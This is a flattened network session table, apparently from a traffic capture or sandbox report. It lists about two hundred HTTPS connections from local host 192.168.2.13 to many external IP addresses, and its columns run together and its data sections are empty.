                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16442192.168.2.135321012.68.246.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16443192.168.2.13476181.183.129.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16444192.168.2.1333774174.141.206.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16445192.168.2.1343560162.70.227.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16446192.168.2.1352120201.43.130.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16447192.168.2.1345312205.236.6.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16448192.168.2.1346552113.12.252.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16449192.168.2.1339996145.224.111.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16450192.168.2.135542224.12.72.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16451192.168.2.1353946160.174.54.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16452192.168.2.1351022198.94.226.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16453192.168.2.135950661.52.40.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16454192.168.2.1351256132.228.128.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16455192.168.2.1337708167.165.42.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16456192.168.2.1357390169.119.255.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16457192.168.2.134502482.93.60.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16458192.168.2.13424564.46.107.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16459192.168.2.13463244.27.194.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16460192.168.2.1339888123.216.63.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16461192.168.2.1341776131.109.79.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16462192.168.2.135143283.179.161.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16463192.168.2.1338116157.2.226.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16464192.168.2.1341382104.6.31.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16465192.168.2.135318619.127.68.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16466192.168.2.1350716206.38.249.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16467192.168.2.1358620158.56.112.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16468192.168.2.135178651.53.118.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16469192.168.2.1360774143.231.170.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16470192.168.2.1352692157.230.245.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16471192.168.2.1350242207.246.251.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16472192.168.2.1348762175.31.142.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16473192.168.2.133685494.50.115.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16474192.168.2.1358376108.186.91.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16475192.168.2.133671625.217.84.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16476192.168.2.13542324.52.114.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16477192.168.2.1341666144.60.43.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16478192.168.2.1358486124.43.100.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16479192.168.2.133463436.161.0.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16480192.168.2.13591228.143.14.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16481192.168.2.1354344209.173.96.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16482192.168.2.133376036.27.199.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16483192.168.2.134564432.71.62.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16484192.168.2.1356792134.176.33.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16485192.168.2.134484486.1.50.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16486192.168.2.1343308123.206.123.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16487192.168.2.1343836131.255.168.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16488192.168.2.1351504172.244.41.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16489192.168.2.133525291.112.75.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16490192.168.2.1358846145.134.166.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16491192.168.2.1354672100.223.169.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16492192.168.2.1343982147.207.176.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16493192.168.2.1357050103.29.209.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16494192.168.2.1344758176.114.7.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16495192.168.2.134631840.34.120.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16496192.168.2.135946298.98.250.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16497192.168.2.1359774133.49.39.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16498192.168.2.1347678113.41.76.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16499192.168.2.1344876186.228.89.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16500192.168.2.133917240.32.151.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16501192.168.2.1351710131.127.87.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16502192.168.2.134862234.235.99.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16503192.168.2.133803458.220.71.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16504192.168.2.135790275.94.14.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16505192.168.2.1334076159.165.154.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16506192.168.2.1357054157.85.148.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16507192.168.2.135942648.107.85.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16508192.168.2.1339392179.128.96.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16509192.168.2.1346196189.85.230.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16510192.168.2.134242448.96.177.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16511192.168.2.1351634139.161.55.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16512192.168.2.133585232.58.118.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16513192.168.2.1355478174.74.95.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16514192.168.2.1347884140.24.89.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16515192.168.2.1354544160.218.153.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16516192.168.2.135304813.162.243.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16517192.168.2.135201488.14.208.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16518192.168.2.1354930145.180.102.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16519192.168.2.135518699.220.67.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16520192.168.2.1354348133.152.77.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16521192.168.2.1341918195.173.249.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16522192.168.2.134951243.232.237.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16523192.168.2.1338598125.123.39.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16524192.168.2.134519871.170.36.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16525192.168.2.1343916117.88.56.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16526192.168.2.133397661.88.28.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16527192.168.2.1359114173.249.180.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16528192.168.2.1351800120.26.7.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16529192.168.2.135035857.6.60.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16530192.168.2.134373271.179.51.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16531192.168.2.1353584125.255.54.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16532192.168.2.1345812144.39.161.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16533192.168.2.135553640.187.144.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16534192.168.2.135503881.45.253.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16535192.168.2.135581846.252.248.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16536192.168.2.1344028143.20.110.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16537192.168.2.133456888.33.113.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16538192.168.2.136067444.100.56.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16539192.168.2.134826894.33.132.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16540192.168.2.1355168181.205.122.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16541192.168.2.134103212.71.0.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16542192.168.2.135715261.57.123.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16543192.168.2.1359628190.49.48.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16544192.168.2.133781881.116.73.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16545192.168.2.1347780137.233.104.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16546192.168.2.1353676202.239.160.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16547192.168.2.1336682120.187.201.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16548192.168.2.133918212.134.15.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16549192.168.2.1339142154.110.181.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16550192.168.2.133373234.235.132.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16551192.168.2.1354040144.216.110.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16552192.168.2.1360958166.211.218.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16553192.168.2.1360066143.210.185.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16554192.168.2.1345132144.95.18.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16555192.168.2.133589844.255.30.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16556192.168.2.1340076204.130.161.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16557192.168.2.1344106128.63.215.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16558192.168.2.1357242168.14.79.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16559192.168.2.1343376113.135.224.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16560192.168.2.1339008189.250.173.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16561192.168.2.135300218.131.85.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16562192.168.2.1343492221.250.93.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16563192.168.2.1339802176.49.90.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16564192.168.2.1350660192.77.117.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16565192.168.2.1337104111.58.194.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16566192.168.2.135285272.63.246.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16567192.168.2.1359936156.219.179.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16568192.168.2.1360762119.226.228.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16569192.168.2.135455635.138.114.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16570192.168.2.1354372219.183.53.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16571192.168.2.134653436.182.110.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16572192.168.2.133812267.246.113.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16573192.168.2.1349248176.98.188.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16574192.168.2.1355796100.220.177.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16575192.168.2.1351642218.6.33.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16576192.168.2.1343560190.151.48.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16577192.168.2.13345629.75.230.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16578192.168.2.1350750137.76.167.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16579192.168.2.13369088.193.222.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16580192.168.2.1358780154.172.1.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16581192.168.2.134932232.132.66.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16582192.168.2.1338792107.9.108.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16583192.168.2.1359976167.225.250.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16584192.168.2.1335698179.236.7.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16585192.168.2.1359082157.232.113.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16586192.168.2.1358640107.65.72.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16587192.168.2.1350678223.77.13.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16588192.168.2.1342866164.76.164.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16589192.168.2.133358484.133.136.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16590192.168.2.134453496.244.157.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16591192.168.2.1356448112.226.130.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16592192.168.2.1354312117.202.13.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16593192.168.2.134044651.158.224.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16594192.168.2.1347572101.246.148.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16595192.168.2.1333748203.186.99.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16596192.168.2.1356416134.16.106.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16597192.168.2.1336128199.90.151.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16598192.168.2.134480627.171.183.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16599192.168.2.1359506183.35.175.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16600192.168.2.134282025.148.60.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16601192.168.2.135100419.244.203.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16602192.168.2.1358772113.40.196.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16603192.168.2.134210087.156.145.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16604192.168.2.1356920158.38.124.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16605192.168.2.1345944100.33.184.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16606192.168.2.135599881.135.124.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16607192.168.2.1358392150.246.199.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16608192.168.2.134275089.147.234.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16609192.168.2.1339156168.41.213.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16610192.168.2.1358150174.153.136.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16611192.168.2.133829813.238.115.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16612192.168.2.13586748.111.116.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16613192.168.2.135144479.231.129.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16614192.168.2.133437444.181.164.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16615192.168.2.134537870.212.181.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16616192.168.2.134388873.8.20.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16617192.168.2.134242473.174.51.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16618192.168.2.13565865.165.155.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16619192.168.2.1350786132.234.178.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16620192.168.2.135455658.100.86.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16621192.168.2.133421286.99.44.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16622192.168.2.1352578118.158.128.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16623192.168.2.135733680.174.7.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16624192.168.2.1357168145.56.61.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16625192.168.2.134041647.246.94.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16626192.168.2.1357430176.234.37.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16627192.168.2.134379477.26.164.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16628192.168.2.1334486114.247.90.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16629192.168.2.1356320102.176.154.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16630192.168.2.1355034186.198.157.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16631192.168.2.133975663.141.198.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16632192.168.2.13387309.105.212.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16633192.168.2.13455785.94.201.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16634192.168.2.1350300101.136.88.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16635192.168.2.1353604106.106.240.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16636192.168.2.133589261.210.48.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16637192.168.2.1345426110.10.228.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16638192.168.2.1336004171.192.84.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16639192.168.2.1337372155.110.135.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16640192.168.2.1356834187.4.172.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16641192.168.2.13607329.108.86.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16642192.168.2.13453944.51.178.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16643192.168.2.13471624.62.213.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16644192.168.2.135720262.243.148.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16645192.168.2.1333394221.9.31.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16646192.168.2.1353124152.54.78.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16647192.168.2.1351746110.136.96.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16648192.168.2.1358736216.81.208.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16649192.168.2.1337668203.196.230.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16650192.168.2.133793064.235.123.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16651192.168.2.13562489.195.56.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16652192.168.2.134551249.113.231.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16653192.168.2.13381349.143.46.12443
                                                  TimestampBytes transferredDirectionData


